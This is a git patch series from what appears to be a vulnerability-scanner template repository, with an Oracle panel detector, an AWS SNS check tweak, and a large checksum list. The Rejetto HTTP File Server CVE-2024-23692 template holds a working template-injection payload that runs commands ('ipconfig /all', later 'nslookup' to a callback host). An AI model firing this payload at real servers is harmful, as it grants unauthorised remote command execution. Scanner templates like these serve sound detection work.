deletions(-) diff --git a/http/cves/2024/CVE-2024-23692 b/http/cves/2024/CVE-2024-23692 index c8020027d8..e60a524677 100644 --- a/http/cves/2024/CVE-2024-23692 +++ b/http/cves/2024/CVE-2024-23692 @@ -1,15 +1,14 @@ id: CVE-2024-23692 info: - name: Rejetto HTTP File Server - Template injection + name: Rejetto HTTP File Server - Template injection author: johnk3r - severity: critical + severity: high description: | - This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. + This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. reference: - https://github.com/rapid7/metasploit-framework/pull/19240 - - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce - - https://nvd.nist.gov/vuln/detail/CVE-2024-23692 + - https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/ metadata: verified: true max-request: 1 @@ -19,17 +18,15 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + - "{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}" + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "Windows IP Configuration" - - "Host Name" + - type: word + part: interactsh_protocol + words: + - "dns" - extractors: - - type: regex - part: body - regex: - - "Host Name .+ : ([^\r\n]+)" + - type: status + status: + - 200 From 606e14add5e300faec37683abadc06f23cea205f Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Sat, 8 Jun 2024 17:43:35 +0200 Subject: [PATCH 745/847] Add files via upload --- .../oracle-application-server-panel.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/exposed-panels/oracle-application-server-panel.yaml diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml new file mode 100644 index 0000000000..1dc2c0d97a --- /dev/null +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -0,0 +1,29 @@ +id: oracle-application-server-panel + +info: + name: Oracle Application Server Login Panel - Detect + author: righettod + severity: info + description: Oracle Application Server login panel was detected. + metadata: + shodan-query: http.title:"Oracle Containers for J2EE" + max-request: 1 + tags: panel,oracle,containers,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/em/console/ias/oc4j/home" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "login to oracle application server control", "oracle enterprise manager")' + condition: and + + extractors: + - type: regex + group: 1 + regex: + - '(?i)Copyright\s+©\s+([0-9,\s]+),\s+Oracle' From 1bd911cc2e0058d42b834b4f51b4337c37101904 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Sat, 8 Jun 2024 17:55:20 +0200 Subject: [PATCH 746/847] Add the reference attribute --- http/exposed-panels/oracle-application-server-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml index 1dc2c0d97a..ad1b8e4634 100644 --- a/http/exposed-panels/oracle-application-server-panel.yaml +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -5,6 +5,8 @@ info: author: righettod severity: info description: Oracle Application Server login panel was detected. + reference: + - https://www.oracle.com/middleware/technologies/internet-application-server.html metadata: shodan-query: http.title:"Oracle Containers for J2EE" max-request: 1 From 5d069d5d4abe9274721bc317085eeda8132974e9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 8 Jun 2024 21:29:53 +0530 Subject: [PATCH 747/847] removed user digest --- cloud/aws/sns/sns-topic-public-accessible.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cloud/aws/sns/sns-topic-public-accessible.yaml b/cloud/aws/sns/sns-topic-public-accessible.yaml index fac24e4858..6427be550d 100644 --- a/cloud/aws/sns/sns-topic-public-accessible.yaml +++ b/cloud/aws/sns/sns-topic-public-accessible.yaml @@ -61,5 +61,4 @@ code: extractors: - type: dsl dsl: - - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' -# digest: 4a0a00473045022100a86cbadd9b2cca9f3e2eeb26bef158bf6658165af060938dc49ce7d588c776be0220179263c7d0129712f96ae3284cc2701c0407a1ca739ecf45729d656af36816d0:366f2a24c8eb519f6968bd8801c08ebe \ No newline at end of file + - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' \ No newline at end of file From 9f8904a67ae811ace986f54ad19d853af866865b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 8 Jun 2024 16:00:20 +0000 Subject: [PATCH 748/847] Auto Generated New Template Addition List [Sat Jun 8 16:00:20 UTC 2024] :robot: --- .new-additions | 77 -------------------------------------------------- 1 file changed, 77 deletions(-) diff --git a/.new-additions b/.new-additions index 1d1d596f6e..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,77 +0,0 @@ -cloud/aws/sns/sns-topic-public-accessible.yaml -headless/webpack-sourcemap.yaml -http/cnvd/2024/CNVD-2024-15077.yaml -http/cves/2022/CVE-2022-0666.yaml -http/cves/2022/CVE-2022-1580.yaml -http/cves/2022/CVE-2022-34534.yaml -http/cves/2023/CVE-2023-2059.yaml -http/cves/2023/CVE-2023-3077.yaml -http/cves/2023/CVE-2023-35162.yaml -http/cves/2023/CVE-2023-48084.yaml -http/cves/2024/CVE-2024-1380.yaml -http/cves/2024/CVE-2024-21683.yaml -http/cves/2024/CVE-2024-24919.yaml -http/cves/2024/CVE-2024-27348.yaml -http/cves/2024/CVE-2024-34470.yaml -http/cves/2024/CVE-2024-3495.yaml -http/cves/2024/CVE-2024-3822.yaml -http/cves/2024/CVE-2024-4358.yaml -http/cves/2024/CVE-2024-5230.yaml -http/default-logins/ampjuke-default-login.yaml -http/default-logins/cambium-networks/cambium-networks-default-login.yaml -http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml -http/exposed-panels/busybox-repository-browser.yaml -http/exposed-panels/cisco-firepower-panel.yaml -http/exposed-panels/cox-business-panel.yaml -http/exposed-panels/digital-watchdog-panel.yaml -http/exposed-panels/f5-admin-interface.yaml -http/exposed-panels/fortinet/fortisiem-panel.yaml -http/exposed-panels/oracle-access-management.yaml -http/exposed-panels/oracle-peoplesoft-panel.yaml -http/exposed-panels/vrealize-hyperic-login-panel.yaml -http/exposures/tokens/wechat/wechat-secret-key.yaml -http/iot/netgear-boarddataww-rce.yaml -http/miscellaneous/directory-listing.yaml -http/misconfiguration/dont-panic-traceback.yaml -http/misconfiguration/installer/activecollab-installer.yaml -http/misconfiguration/installer/call-com-installer.yaml -http/misconfiguration/installer/cms-made-simple-installer.yaml -http/misconfiguration/installer/confluence-installer.yaml -http/misconfiguration/installer/cubebackup-setup-installer.yaml -http/misconfiguration/installer/easy-wi-installer.yaml -http/misconfiguration/installer/ejbca-enterprise-installer.yaml -http/misconfiguration/installer/flarum-installer.yaml -http/misconfiguration/installer/fleetcart-installer.yaml -http/misconfiguration/installer/glpi-installer.yaml -http/misconfiguration/installer/invicti-enterprise-installer.yaml -http/misconfiguration/installer/invoice-ninja-installer.yaml -http/misconfiguration/installer/jfa-go-installer.yaml -http/misconfiguration/installer/justfans-installer.yaml -http/misconfiguration/installer/librenms-installer.yaml -http/misconfiguration/installer/mura-cms-setup-installer.yaml -http/misconfiguration/installer/onlyoffice-installer.yaml -http/misconfiguration/installer/openemr-setup-installer.yaml -http/misconfiguration/installer/orchard-installer.yaml -http/misconfiguration/installer/pandora-fms-installer.yaml -http/misconfiguration/installer/profittrailer-installer.yaml -http/misconfiguration/installer/projectsend-installer.yaml -http/misconfiguration/installer/snipe-it-installer.yaml -http/misconfiguration/installer/stackposts-installer.yaml -http/misconfiguration/installer/tastyigniter-installer.yaml -http/misconfiguration/installer/ubersmith-installer.yaml -http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml -http/misconfiguration/installer/virtual-smartzone-installer.yaml -http/misconfiguration/installer/wowonder-installer.yaml -http/technologies/cowboy-detect.yaml -http/technologies/gabia-server-detect.yaml -http/technologies/gotweb-detect.yaml -http/technologies/sparklighter-detect.yaml -http/vulnerabilities/other/aquatronica-info-leak.yaml -http/vulnerabilities/other/array-vpn-lfi.yaml -http/vulnerabilities/other/cerio-dt-rce.yaml -http/vulnerabilities/other/easycvr-info-leak.yaml -javascript/backdoor/proftpd-backdoor.yaml -javascript/detection/samba-detect.yaml -javascript/enumeration/rsync/rsync-list-modules.yaml -network/detection/bitvise-ssh-detect.yaml -passive/cves/2024/CVE-2024-25723.yaml From 8f868588ec6ef8cbb3b6c7f3f556472d43de44c7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 8 Jun 2024 16:00:32 +0000 Subject: [PATCH 749/847] Auto Generated Templates Checksum [Sat Jun 8 16:00:32 UTC 2024] :robot: --- templates-checksum.txt | 4962 ++++++++++++++++++++-------------------- 1 file changed, 2481 insertions(+), 2481 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d5a28f4808..d4311160f2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,35 +2,35 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:09d062de57bad60db1e4dd1b9bca44e9aec54885 +README.md:ad31a3900ed4d39f7021d78dc0372290accfc1bc README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:7a8b19dcd47380dc5946c94d97eccf2a9de82838 -TEMPLATES-STATS.md:ca8a2904a0b1c9b675bd03d9876539ec3293977f -TOP-10.md:8521fdfb4307347b855a19fcd895ab3608ffc444 +TEMPLATES-STATS.json:4ba5810b3ed18d96142d1e6001395674ce2ec334 +TEMPLATES-STATS.md:c8d67b997860d489ea1c6fa3ced489f775541b8c +TOP-10.md:83cb75ab6007e6212c71f3156a91e4c7756a08fc cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f -cloud/aws/acm/acm-cert-renewal-30days.yaml:a90f78e355c103211f113d112ced769e7a0297a2 -cloud/aws/acm/acm-cert-renewal-45days.yaml:31dd523c386a3e2fce9e6882f0bd6eadcb5d9527 -cloud/aws/acm/acm-cert-validation.yaml:891b15ef24fe616c05b41fdae8242b8bacbcf423 -cloud/aws/acm/acm-wildcard-cert.yaml:f4d73e68c35f053f380fd062dc7b71cdbc060750 -cloud/aws/aws-code-env.yaml:3c7eeaeac960521b0547497edaa44d469ab58203 -cloud/aws/cloudtrail/cloudtrail-data-events.yaml:f6857df8f5cbc5a10ee7725198a2b02b3cac501a -cloud/aws/cloudtrail/cloudtrail-disabled.yaml:0db02de4f3982841322b13d05639c827243eac5c -cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:71aafc94886bc0bf1ad799a59043ccb14c736d53 -cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:0fdecbb14773ede92defb5550f8b6f280675ae77 -cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:4e6f15779999587b4ebbcf8b0ddc523155decb48 -cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:2493c4d57eef3d147cf93ffd7a492cfc409f1426 -cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:4f082a6a5aed38fdbf01a3194fbaffc4cd799a8a -cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:ca1a07dc81a0071d64ab7a4d9868367d1c7465ea -cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:c5c333bcd31a6282a913a9cfe7a440566ed1bb78 -cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:4fd566c83837e16dbc3b4db04b840b0abcba2804 -cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:2047446aa3af9e434021c99613c80934822674cd -cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:ed584c7d7d5243de717f7405fa56524eb9b68f8e -cloud/aws/cloudwatch/cw-alarm-action-set.yaml:13a6734ecaf4c832f0ca3b090bffc12c6e13ccea -cloud/aws/cloudwatch/cw-alarms-actions.yaml:0b41499c8dc66fc8f2b595ebb1ee4413ed3df085 -cloud/aws/ec2/ec2-imdsv2.yaml:dedb60f2627758fd64f4e823be5c5b45e45f5eab -cloud/aws/ec2/ec2-public-ip.yaml:bba5b508db8d775685d79ae9e99c67c2a3d76e03 -cloud/aws/ec2/ec2-sg-egress-open.yaml:714d210f9edcb41bfa504c4a13645244f780c7fc -cloud/aws/ec2/ec2-sg-ingress.yaml:81e2d4f7083463db4b213fe9ac342471a1410ad9 +cloud/aws/acm/acm-cert-renewal-30days.yaml:c35bb6f6352b7f292b342c421ca5aa03f7fa21d4 +cloud/aws/acm/acm-cert-renewal-45days.yaml:b507b0434b601a48b7b316628fbed69170bf8a4f +cloud/aws/acm/acm-cert-validation.yaml:5d89d6b03e37950111e550a94c07381422fe5671 +cloud/aws/acm/acm-wildcard-cert.yaml:dda18aab45e86835d302c3b4dbb6fc986b90db0a +cloud/aws/aws-code-env.yaml:d5b86acbee81b62cbebca8f0e9ea783326da5f1e +cloud/aws/cloudtrail/cloudtrail-data-events.yaml:f02575ad6a0f2cb41d4b8a97a2f352a841788060 +cloud/aws/cloudtrail/cloudtrail-disabled.yaml:50b5bb4616bd41ea3c588bd148777d4e7f996c07 +cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml:d7943f0043bcfe7c9ef9f58a649ed21ada8a104a +cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml:c06c27e68774a784761d0cbd3689fdd89863d7a3 +cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml:3bcfa775b1e509ace4f07894c5e64dec2a8102d0 +cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml:efbd1fb8316fb0c722ef3594acf3ab73ab507001 +cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml:7b4ef3cfeb343431d1f9b190e120eaaa91bebc7f +cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml:906ba0ad97de252e06c50c38730aaebdac7bc023 +cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml:b4df47fb9e6d61ed3b23cece6fdc520af4e27272 +cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml:6a5e502d62e12375a44372597e413fff2bf4eb8f +cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml:8312fc3a5afcd9be518ec3c1307e33c5fbdc8876 +cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml:77ada67363c284bd1d4f88f954d5e32c0215fced +cloud/aws/cloudwatch/cw-alarm-action-set.yaml:8e93205afe124c575c452e08c3f495a0bc0d6322 +cloud/aws/cloudwatch/cw-alarms-actions.yaml:1bd05f73d6b1397f8301ef4470953e937b85349c +cloud/aws/ec2/ec2-imdsv2.yaml:b7ae7a7a6058c3610711eda97012b2fcd730b66c +cloud/aws/ec2/ec2-public-ip.yaml:51f2fc2d002b379bbac747eef58ab0f0ebbc7c3b +cloud/aws/ec2/ec2-sg-egress-open.yaml:be43d24ee1e4725de739360bd2e5f8612bb2ab20 +cloud/aws/ec2/ec2-sg-ingress.yaml:7964a909402f282b12879eddfe63a102937603d9 cloud/aws/ec2/ec2-unrestricted-cifs.yaml:7eabd6e954f8d0070f2b5f51fd484a61ccd5aced cloud/aws/ec2/ec2-unrestricted-dns.yaml:28b9a572c9620e84a77538311fe8d5e285b60fff cloud/aws/ec2/ec2-unrestricted-ftp.yaml:c2bca6e54611f703c31298bb5ad5f21a8f21cb8a @@ -50,69 +50,69 @@ cloud/aws/ec2/ec2-unrestricted-redis.yaml:900da1c9b31742203eda75afd776c3741bf4d3 cloud/aws/ec2/ec2-unrestricted-smtp.yaml:e0e56306e511d708334ff997489e4351104028a9 cloud/aws/ec2/ec2-unrestricted-ssh.yaml:92a1200da475f085c33d0f86edd3077ba19eea33 cloud/aws/ec2/ec2-unrestricted-telnet.yaml:d7f80cec0723d2723300c078552824ec1a8b641a -cloud/aws/ec2/publicly-shared-ami.yaml:1151ecc81064e141e9efde1368d4749b35065364 -cloud/aws/ec2/unencrypted-aws-ami.yaml:477dd2aa6f1ddf8846ccd874096cfdf8787b3e35 +cloud/aws/ec2/publicly-shared-ami.yaml:1b230fa757bc87a3872f3cf28caea7febf2ff4f6 +cloud/aws/ec2/unencrypted-aws-ami.yaml:76a00cb25301c234cb8900b74ad5cdc88f8a92fb cloud/aws/iam/iam-access-analyzer.yaml:f50b212fc028372e3aeba52e43c0417c845a01a9 cloud/aws/iam/iam-expired-ssl.yaml:a2ec4618352430440ddb4d7704058a4c7507d3f8 -cloud/aws/iam/iam-full-admin-privileges.yaml:2955b6c197acfac1f2c5a70fe9f69ac287863652 -cloud/aws/iam/iam-key-rotation-90days.yaml:f7f4a4b8f836227020221d3102e70437d3f20b5e -cloud/aws/iam/iam-mfa-enable.yaml:4cc722d5aab1bfd029cebd23aef12ccbc9711a04 +cloud/aws/iam/iam-full-admin-privileges.yaml:b688df4035b376d214403db5be25bde4c2f70381 +cloud/aws/iam/iam-key-rotation-90days.yaml:c6a3a5ebb54f4220734c0b3ef47b2a5972c57f33 +cloud/aws/iam/iam-mfa-enable.yaml:881d50b89365d4f976e8896ab448f21cf8492372 cloud/aws/iam/iam-password-policy.yaml:0c0198bd8d1a51bb19a33eaca3eb0e0084ddb229 cloud/aws/iam/iam-root-mfa.yaml:5b82c6ccd615779185fd186e0a7c0455c02340fc -cloud/aws/iam/iam-ssh-keys-rotation.yaml:4b15b7f525519172f3ce3d7ba4eabb9c2b530560 +cloud/aws/iam/iam-ssh-keys-rotation.yaml:f9f071c240df8cc1a536af96addb949a629fa427 cloud/aws/iam/iam-unapproved-policy.yaml:883cdcaea84c6970f6f99cc3289ffc2ed85bbac1 cloud/aws/iam/iam-user-password-change.yaml:99ffdaecc6bb1aa4200a5853b703163276a1b2af cloud/aws/iam/ssl-cert-renewal.yaml:40622e59896e04627695c6d286e0015aaed13010 -cloud/aws/rds/aurora-copy-tags-snap.yaml:24cdac257293625e8dc1c0239caf3ee7d0c51e98 -cloud/aws/rds/aurora-delete-protect.yaml:204588cae0f19c39376a6e74287d4df5d384d7ab -cloud/aws/rds/iam-db-auth.yaml:d1efbfb4d23f7b406fc2fd7a0555399f958a16ac -cloud/aws/rds/rds-backup-enable.yaml:d6ea933f3e4aa18ec835f424b4dec8a209e3cd52 -cloud/aws/rds/rds-deletion-protection.yaml:bdff9fb15d819b0de48f2c4c5ff9a941154032fd -cloud/aws/rds/rds-encryption-check.yaml:b4832d4c4fe440f61f3ff1cb9525153320f14ffd +cloud/aws/rds/aurora-copy-tags-snap.yaml:34e67858bdd4c7dc64f6e4ab81ba16cf566e8591 +cloud/aws/rds/aurora-delete-protect.yaml:2fe057fba18afe1489d452c15a45813c3c4a01b2 +cloud/aws/rds/iam-db-auth.yaml:abca14ba56ec135b925a960be79155e318cc6315 +cloud/aws/rds/rds-backup-enable.yaml:e0aff94d2aef3573de529a563e157a0e7979b54e +cloud/aws/rds/rds-deletion-protection.yaml:96a5ed61c07064568e10f1b0b323a642bcf1dcbc +cloud/aws/rds/rds-encryption-check.yaml:09f859cd5a745c4188e35c94fe84818aa4ffdea7 cloud/aws/rds/rds-event-notify.yaml:03998790659d38696b70b1f3e6c64c6dffccc7a2 cloud/aws/rds/rds-event-sub-enable.yaml:10469f43441c8414c199458f88524419275a187b cloud/aws/rds/rds-event-sub.yaml:f83dba6f60062de8a3accc50ed6ef2e83aca9e67 -cloud/aws/rds/rds-gp-ssd-usage.yaml:08cf1e2b4c7fcc2f78aa73f2b47d107023df259e -cloud/aws/rds/rds-public-snapshot.yaml:64d174a5801b03fecb919f35e4a09457c63b85f6 -cloud/aws/rds/rds-public-subnet.yaml:f521f7086ad9c715bf4dfab136a8bd5d535c93a5 -cloud/aws/rds/rds-ri-payment-fail.yaml:367cae7258f5a082dbff4168b15ae288527242c9 -cloud/aws/rds/rds-snapshot-encryption.yaml:12260c9aa3a91078b974f79bd0f051f85b8986dd -cloud/aws/s3/s3-access-logging.yaml:596c721b62e1158cd205f20c5e27a7b9212a5212 -cloud/aws/s3/s3-auth-fullcontrol.yaml:6f79caf71bab7ec1ed77903bfae883a928436432 -cloud/aws/s3/s3-bucket-key.yaml:6dfed7abf1b5641d40fb43fb20c7ea982e8ecd9f -cloud/aws/s3/s3-bucket-policy-public-access.yaml:822fe635c69581edbb60e8d7d8e55531b2bb15cd -cloud/aws/s3/s3-mfa-delete-check.yaml:f38a32e9e9644cc061c53cfa92005a27982f1023 -cloud/aws/s3/s3-public-read-acp.yaml:8689176e409be79d1a188f3dd05bc1de7369be45 -cloud/aws/s3/s3-public-read.yaml:f6087d960c9e9b1a59183cef5ab73bab7ce44dfe -cloud/aws/s3/s3-public-write-acp.yaml:3f2b36613d8008e1ac419f86a3986b6805958a39 -cloud/aws/s3/s3-public-write.yaml:f437b7481168279f14d743f6fcec2b07388e894e -cloud/aws/s3/s3-server-side-encryption.yaml:5ad53f21b9bd0f6429456de397a4ecf6b45f5e24 -cloud/aws/s3/s3-versioning.yaml:bc4dadf7b83430d4f1d666bc0d61fff82bd0af1a -cloud/aws/sns/sns-topic-public-accessible.yaml:fc848d1ed7e11d8ff1b69c54af0909b8742b420c -cloud/aws/vpc/nacl-open-inbound.yaml:4117d3d0d468f9b723f63cd36a964cd73f82e76f -cloud/aws/vpc/nacl-outbound-restrict.yaml:dccc34edf2429e53bef902b6979e52418b415c14 -cloud/aws/vpc/nat-gateway-usage.yaml:c292fbd2ca07a84b1c10d83cce119c2a024fb800 -cloud/aws/vpc/unrestricted-admin-ports.yaml:3364c4aaa26cd2252bab903ac561fd8eb2fd2314 -cloud/aws/vpc/vpc-endpoint-exposed.yaml:b5517ee9213554b46ac6ed3064f8e78adbab0108 -cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:1ddc0bac11e1c8827ae10389e8fb35444f8a0a82 -cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:962bdc88135be9ba9328fd7fd9ad52d26c1fed6b -cloud/aws/vpc/vpn-tunnel-down.yaml:427ec306b6366a932a6a2c0c0d6f45b8ebf850de +cloud/aws/rds/rds-gp-ssd-usage.yaml:9dc075230c55ead686818722050380f6404e6a14 +cloud/aws/rds/rds-public-snapshot.yaml:307a8023623a3135d5e8adb105660f52426da48c +cloud/aws/rds/rds-public-subnet.yaml:39a47b39e010cd3b0854d7008adaf224ebafea92 +cloud/aws/rds/rds-ri-payment-fail.yaml:6181710de88b12b439682c924b4b5267f8f122e8 +cloud/aws/rds/rds-snapshot-encryption.yaml:4126d049126c4c982252c06475b0744ca3c4c0e2 +cloud/aws/s3/s3-access-logging.yaml:f391ad75eb3174ceeeeb6e496a5ab45d08e65f51 +cloud/aws/s3/s3-auth-fullcontrol.yaml:7832f30b25cf7f8217b3e734c4d86b7b21626a46 +cloud/aws/s3/s3-bucket-key.yaml:f4268bce463fd696b07d82f14877c02defde0e1f +cloud/aws/s3/s3-bucket-policy-public-access.yaml:7b509947c50ce3b4bf6a826c8f8c5631a0b30a2b +cloud/aws/s3/s3-mfa-delete-check.yaml:b3778d31e6ad283506389e031d501e5548bda42c +cloud/aws/s3/s3-public-read-acp.yaml:4c0b07cde46c6d3e11cdb3ff34bb6d3f491df69b +cloud/aws/s3/s3-public-read.yaml:d0a029d1df6d987bfbda997bf1370b41e26e640e +cloud/aws/s3/s3-public-write-acp.yaml:ee80977bb47d13a81cb7d7f1b2fc36ca396b0e3e +cloud/aws/s3/s3-public-write.yaml:37a3ce73d1d947d355245806f6c6a8dedf569691 +cloud/aws/s3/s3-server-side-encryption.yaml:81c5384c6fbf9ab0dd475a26ee4eda0507c40edc +cloud/aws/s3/s3-versioning.yaml:7a28352d7f81784bb2f08e08376023fde47e234b +cloud/aws/sns/sns-topic-public-accessible.yaml:9821c4c1ed5b22b0b57184f34fa4619932c9f405 +cloud/aws/vpc/nacl-open-inbound.yaml:5e1ef2d22f533b048c8f22662bf0f6f341a0a32d +cloud/aws/vpc/nacl-outbound-restrict.yaml:d00bcba3fa5e0c8efa02bcfcd0dfac25a3d09564 +cloud/aws/vpc/nat-gateway-usage.yaml:c9da419a181294a5d2b70734b82a2f6592b95099 +cloud/aws/vpc/unrestricted-admin-ports.yaml:0be6a01f11196a2c8da29f70d6f29abeab7bfda1 +cloud/aws/vpc/vpc-endpoint-exposed.yaml:671dd1bf89e2ea988aeaae08da632805c8eb75c5 +cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:0f4d4bbcdf6e0da8e942ec2f91a1219b22d0e09b +cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:fc8346995c4cdbdb57ef8d592529e470416ad3f2 +cloud/aws/vpc/vpn-tunnel-down.yaml:2f8fe16da2e6465527a674b60b3d81f1055b4d30 cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f -cloud/enum/azure-db-enum.yaml:1a84da310edfa148667be811a8f749b93a263d0a -cloud/enum/azure-vm-cloud-enum.yaml:a038ac248602f1d51b6c2d5a11da8db087537ee1 +cloud/enum/azure-db-enum.yaml:29f1ad33a47d39bc552d02533839a80b79619900 +cloud/enum/azure-vm-cloud-enum.yaml:18c6da26918310034f8eb035697eae577a724805 cloud/enum/azure-website-enum.yaml:02e3fbd067ec765f0d87e069624d68b802323137 cloud/enum/gcp-app-engine-enum.yaml:735d4025743533df111b8bee9132eb2503019b92 cloud/enum/gcp-bucket-enum.yaml:954d5a61d8cceec64101392998396f4c48cb94c4 cloud/enum/gcp-firebase-app-enum.yaml:3fd3b413096838d123d31f2a7e3ccb02bc74dd73 cloud/enum/gcp-firebase-rtdb-enum.yaml:4bd510aa205a80e5b9db5572b16b90949d898842 -code/cves/2019/CVE-2019-14287.yaml:8a283265f4e93eeaee636811db34328f70ed1023 -code/cves/2021/CVE-2021-3156.yaml:87cee025b7ef9519c1b7c7e845cf6465cb9a9ae1 -code/cves/2023/CVE-2023-2640.yaml:2c9f53847e7a7188de0d463c49cd4eb4581a937d -code/cves/2023/CVE-2023-49105.yaml:b9c2b5e1f6323d11dafb860f563c48bfc13eb224 -code/cves/2023/CVE-2023-4911.yaml:0cd65b591ec6b8fa45cb4f8053f30a068ff314fe -code/cves/2023/CVE-2023-6246.yaml:2187abd99c50e582bc641c8d3b13eb40eb98b5d9 -code/cves/2024/CVE-2024-3094.yaml:a4d26ac3f63d290fe67be4dc22d8c0f501fd65d3 +code/cves/2019/CVE-2019-14287.yaml:c57f9bad2346d2a553366398a3a4dfb9370ddcb2 +code/cves/2021/CVE-2021-3156.yaml:a2f36d0bf44a323b821c30437399ae6ad5852abd +code/cves/2023/CVE-2023-2640.yaml:be9ff617ba5271e2646624e60a5215c664a56f03 +code/cves/2023/CVE-2023-49105.yaml:2308814e81e867c32a5a50d5c9acb28919bea42f +code/cves/2023/CVE-2023-4911.yaml:2f8782ca74a7191a0a2650a2b448f517a0441278 +code/cves/2023/CVE-2023-6246.yaml:91a2678a4f75c6c3fbf349e8dc2422ace1a9ff96 +code/cves/2024/CVE-2024-3094.yaml:68e36febeac5084900eba78657e56587fc86bd6e code/privilege-escalation/linux/binary/privesc-aa-exec.yaml:03e874f0a174244627cc2c167c3d9829bf12f260 code/privilege-escalation/linux/binary/privesc-ash.yaml:a19a050317a19374ca4edc12474fd1de3600999b code/privilege-escalation/linux/binary/privesc-awk.yaml:0fb5884b81ce822978b5c9fbbd5d266333e002be @@ -163,7 +163,7 @@ code/privilege-escalation/linux/binary/privesc-sash.yaml:47db9ab06a4f468b98d6503 code/privilege-escalation/linux/binary/privesc-slsh.yaml:431c5dc758a7683b9da0da0e6beb24d934c70f9e code/privilege-escalation/linux/binary/privesc-socat.yaml:037b6e4915a0c15a9fadd209acd67e814a0860fd code/privilege-escalation/linux/binary/privesc-softlimit.yaml:657b4d5a9ffaa499869ef3b78bed2d150b67ea48 -code/privilege-escalation/linux/binary/privesc-sqlite3.yaml:2058277fb5244f5afcecb2747ae08497ce79d4f1 +code/privilege-escalation/linux/binary/privesc-sqlite3.yaml:48b1edb4197cf2f0b28e00b6962a628135673280 code/privilege-escalation/linux/binary/privesc-ssh-agent.yaml:f0ebce1afdb3fd1eae222f9c7b6ea5a601af3ed0 code/privilege-escalation/linux/binary/privesc-sshpass.yaml:13b17781d68a728c2a05ba9c8d6bca1a72e93105 code/privilege-escalation/linux/binary/privesc-stdbuf.yaml:8102de9b345ef557aefd83e193797a65cdfb8258 @@ -190,29 +190,29 @@ code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 cves.json:7e57aa58a2dde22d0e60ebdfb0a10c00a2310cec cves.json-checksum.txt:8866cb507164321fe99b89f58ef28da52a9cb13b -dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 -dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 